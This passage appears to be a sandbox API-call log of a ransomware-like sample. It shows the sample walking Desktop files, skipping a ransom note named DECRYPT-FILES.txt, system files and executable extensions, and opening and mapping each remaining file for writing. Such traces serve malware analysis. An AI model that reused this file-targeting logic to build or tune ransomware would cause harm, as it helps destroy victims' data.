(lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="autorun.inf") returned 1 [0184.762] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="boot.ini") returned 1 [0184.762] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="desktop.ini") returned 1 [0184.763] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="ntuser.dat") returned 1 [0184.763] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="iconcache.db") returned 1 [0184.763] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="bootsect.bak") returned 1 [0184.763] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="ntuser.dat.log") returned 1 [0184.763] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="thumbs.db") returned -1 [0184.763] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd", lpString2="Bootfont.bin") returned 1 [0184.763] lstrlenW (lpString="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd") returned 30 [0184.763] lstrcmpiW (lpString1="mjTDd", lpString2="lnk") returned 1 [0184.763] lstrcmpiW (lpString1="mjTDd", lpString2="exe") returned 1 [0184.763] lstrcmpiW (lpString1="mjTDd", lpString2="sys") returned -1 [0184.763] lstrcmpiW (lpString1="mjTDd", lpString2="dll") returned 1 [0184.763] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.763] lstrlenW (lpString="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd") returned 30 [0184.763] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0184.763] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="t48Y4Dl5EdImeGV6QG10.bmp.mjTDd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp.mjTDd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp.mjTDd" [0184.763] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp.mjTDd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\t48y4dl5edimegv6qg10.bmp.mjtdd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.763] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=36718) returned 1 [0184.763] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.764] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.764] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.764] CloseHandle (hObject=0x268) returned 1 [0184.764] CloseHandle (hObject=0x264) returned 1 [0184.764] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.765] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2136340, ftCreationTime.dwHighDateTime=0x1d4d3e8, ftLastAccessTime.dwLowDateTime=0xb3e83730, ftLastAccessTime.dwHighDateTime=0x1d4c551, ftLastWriteTime.dwLowDateTime=0xaddc5a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5cdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgz_pfNl6IjRGQlG07.mp3.DZs2U", cAlternateFileName="WGZ_PF~1.DZS")) returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="DECRYPT-FILES.txt") returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="autorun.inf") returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="boot.ini") returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="desktop.ini") returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="ntuser.dat") returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="iconcache.db") returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="bootsect.bak") returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="ntuser.dat.log") returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="thumbs.db") returned 1 [0184.765] lstrcmpiW (lpString1="wgz_pfNl6IjRGQlG07.mp3.DZs2U", lpString2="Bootfont.bin") returned 1 [0184.765] lstrlenW (lpString="wgz_pfNl6IjRGQlG07.mp3.DZs2U") returned 28 [0184.765] lstrcmpiW (lpString1="DZs2U", lpString2="lnk") returned -1 [0184.765] lstrcmpiW (lpString1="DZs2U", lpString2="exe") returned -1 [0184.765] lstrcmpiW (lpString1="DZs2U", lpString2="sys") returned -1 [0184.765] lstrcmpiW (lpString1="DZs2U", lpString2="dll") returned 1 [0184.765] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.765] lstrlenW (lpString="wgz_pfNl6IjRGQlG07.mp3.DZs2U") returned 28 [0184.765] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0184.765] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="wgz_pfNl6IjRGQlG07.mp3.DZs2U" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3.DZs2U") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3.DZs2U" [0184.765] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3.DZs2U" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\wgz_pfnl6ijrgqlg07.mp3.dzs2u"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.766] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=23773) returned 1 [0184.766] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.766] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.766] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.766] CloseHandle (hObject=0x268) returned 1 [0184.766] CloseHandle (hObject=0x264) returned 1 [0184.767] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.767] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4415530, ftCreationTime.dwHighDateTime=0x1d4d34a, ftLastAccessTime.dwLowDateTime=0x5d1a43d0, ftLastAccessTime.dwHighDateTime=0x1d4d1c2, ftLastWriteTime.dwLowDateTime=0xaddebba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xbf2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="wSmC4QXIW6WmrmV.bmp.EPkXYR", cAlternateFileName="WSMC4Q~1.EPK")) returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="DECRYPT-FILES.txt") returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="autorun.inf") returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="boot.ini") returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="desktop.ini") returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="ntuser.dat") returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="iconcache.db") returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="bootsect.bak") returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="ntuser.dat.log") returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="thumbs.db") returned 1 [0184.767] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp.EPkXYR", lpString2="Bootfont.bin") returned 1 [0184.767] lstrlenW (lpString="wSmC4QXIW6WmrmV.bmp.EPkXYR") returned 26 [0184.767] lstrcmpiW (lpString1="EPkXYR", lpString2="lnk") returned -1 [0184.767] lstrcmpiW (lpString1="EPkXYR", lpString2="exe") returned -1 [0184.767] lstrcmpiW (lpString1="EPkXYR", lpString2="sys") returned -1 [0184.767] lstrcmpiW (lpString1="EPkXYR", lpString2="dll") returned 1 [0184.767] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.767] lstrlenW (lpString="wSmC4QXIW6WmrmV.bmp.EPkXYR") returned 26 [0184.767] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0184.767] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="wSmC4QXIW6WmrmV.bmp.EPkXYR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp.EPkXYR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp.EPkXYR" [0184.767] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp.EPkXYR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\wsmc4qxiw6wmrmv.bmp.epkxyr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.768] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=48942) returned 1 [0184.768] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.768] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.769] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.769] CloseHandle (hObject=0x268) returned 1 [0184.769] CloseHandle (hObject=0x264) returned 1 [0184.769] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.769] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4415530, ftCreationTime.dwHighDateTime=0x1d4d34a, ftLastAccessTime.dwLowDateTime=0x5d1a43d0, ftLastAccessTime.dwHighDateTime=0x1d4d1c2, ftLastWriteTime.dwLowDateTime=0xaddebba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xbf2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="wSmC4QXIW6WmrmV.bmp.EPkXYR", cAlternateFileName="WSMC4Q~1.EPK")) returned 0 [0184.769] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0184.769] CloseHandle (hObject=0x25c) returned 1 [0184.769] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x495d3c40, ftCreationTime.dwHighDateTime=0x1d4d392, ftLastAccessTime.dwLowDateTime=0x30ea590, ftLastAccessTime.dwHighDateTime=0x1d4c982, ftLastWriteTime.dwLowDateTime=0xade37e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15211, dwReserved0=0x0, dwReserved1=0x0, cFileName="g_JQdClT.mp3.cYHgovZ", cAlternateFileName="G_JQDC~1.CYH")) returned 1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="DECRYPT-FILES.txt") returned 1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="autorun.inf") returned 1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="boot.ini") returned 1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="desktop.ini") returned 1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="ntuser.dat") returned -1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="iconcache.db") returned -1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="bootsect.bak") returned 1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="ntuser.dat.log") returned -1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="thumbs.db") returned -1 [0184.769] lstrcmpiW (lpString1="g_JQdClT.mp3.cYHgovZ", lpString2="Bootfont.bin") returned 1 [0184.769] lstrlenW (lpString="g_JQdClT.mp3.cYHgovZ") returned 20 [0184.769] lstrcmpiW (lpString1="cYHgovZ", lpString2="lnk") returned -1 [0184.769] lstrcmpiW (lpString1="cYHgovZ", lpString2="exe") returned -1 [0184.770] lstrcmpiW (lpString1="cYHgovZ", lpString2="sys") returned -1 [0184.770] lstrcmpiW (lpString1="cYHgovZ", lpString2="dll") returned -1 [0184.770] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.770] lstrlenW (lpString="g_JQdClT.mp3.cYHgovZ") returned 20 [0184.770] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.770] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="g_JQdClT.mp3.cYHgovZ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3.cYHgovZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3.cYHgovZ" [0184.770] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3.cYHgovZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g_jqdclt.mp3.cyhgovz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.770] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=86545) returned 1 [0184.770] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.770] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.771] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.771] CloseHandle (hObject=0x260) returned 1 [0184.771] CloseHandle (hObject=0x25c) returned 1 [0184.771] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.771] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc85980, ftCreationTime.dwHighDateTime=0x1d4c688, ftLastAccessTime.dwLowDateTime=0x61f32800, ftLastAccessTime.dwHighDateTime=0x1d4c83e, ftLastWriteTime.dwLowDateTime=0xade5dfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf64c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ITt2-JROg.mp4.scXF", cAlternateFileName="ITT2-J~1.SCX")) returned 1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="DECRYPT-FILES.txt") returned 1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="autorun.inf") returned 1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="boot.ini") returned 1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="desktop.ini") returned 1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="ntuser.dat") returned -1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="iconcache.db") returned 1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="bootsect.bak") returned 1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="ntuser.dat.log") returned -1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="thumbs.db") returned -1 [0184.771] lstrcmpiW (lpString1="ITt2-JROg.mp4.scXF", lpString2="Bootfont.bin") returned 1 [0184.771] lstrlenW (lpString="ITt2-JROg.mp4.scXF") returned 18 [0184.772] lstrcmpiW (lpString1="scXF", lpString2="lnk") returned 1 [0184.772] lstrcmpiW (lpString1="scXF", lpString2="exe") returned 1 [0184.772] lstrcmpiW (lpString1="scXF", lpString2="sys") returned -1 [0184.772] lstrcmpiW (lpString1="scXF", lpString2="dll") returned 1 [0184.772] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.772] lstrlenW (lpString="ITt2-JROg.mp4.scXF") returned 18 [0184.772] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.772] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ITt2-JROg.mp4.scXF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4.scXF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4.scXF" [0184.772] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4.scXF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itt2-jrog.mp4.scxf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.772] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=63052) returned 1 [0184.772] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.772] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.773] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.773] CloseHandle (hObject=0x260) returned 1 [0184.773] CloseHandle (hObject=0x25c) returned 1 [0184.773] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.773] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dad490, ftCreationTime.dwHighDateTime=0x1d4cd65, ftLastAccessTime.dwLowDateTime=0x8ce714a0, ftLastAccessTime.dwHighDateTime=0x1d4d391, ftLastWriteTime.dwLowDateTime=0xadeaa280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfec7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_aqHGSKk0khojmC4hut.m4a.gHrC7", cAlternateFileName="J_AQHG~1.GHR")) returned 1 [0184.773] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="DECRYPT-FILES.txt") returned 1 [0184.773] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="autorun.inf") returned 1 [0184.773] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="boot.ini") returned 1 [0184.773] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="desktop.ini") returned 1 [0184.773] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="ntuser.dat") returned -1 [0184.773] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="iconcache.db") returned 1 [0184.774] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="bootsect.bak") returned 1 [0184.774] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="ntuser.dat.log") returned -1 [0184.774] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="thumbs.db") returned -1 [0184.774] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a.gHrC7", lpString2="Bootfont.bin") returned 1 [0184.774] lstrlenW (lpString="J_aqHGSKk0khojmC4hut.m4a.gHrC7") returned 30 [0184.774] lstrcmpiW (lpString1="gHrC7", lpString2="lnk") returned -1 [0184.774] lstrcmpiW (lpString1="gHrC7", lpString2="exe") returned 1 [0184.774] lstrcmpiW (lpString1="gHrC7", lpString2="sys") returned -1 [0184.774] lstrcmpiW (lpString1="gHrC7", lpString2="dll") returned 1 [0184.774] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.774] lstrlenW (lpString="J_aqHGSKk0khojmC4hut.m4a.gHrC7") returned 30 [0184.774] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.774] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="J_aqHGSKk0khojmC4hut.m4a.gHrC7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a.gHrC7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a.gHrC7" [0184.774] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.774] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a.gHrC7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j_aqhgskk0khojmc4hut.m4a.ghrc7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.774] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=65223) returned 1 [0184.774] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.774] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.775] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.775] CloseHandle (hObject=0x260) returned 1 [0184.775] CloseHandle (hObject=0x25c) returned 1 [0184.775] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.775] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x274c2910, ftCreationTime.dwHighDateTime=0x1d4d2a0, ftLastAccessTime.dwLowDateTime=0x537b8710, ftLastAccessTime.dwHighDateTime=0x1d4ca17, ftLastWriteTime.dwLowDateTime=0xaded03e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x12824, dwReserved0=0x0, dwReserved1=0x0, cFileName="lABSAK16Bz2byuU.pps.QiXqj", cAlternateFileName="LABSAK~1.QIX")) returned 1 [0184.775] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="DECRYPT-FILES.txt") returned 1 [0184.775] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="autorun.inf") returned 1 [0184.776] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="boot.ini") returned 1 [0184.776] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps.QiXqj", lpString2="desktop.ini") returned 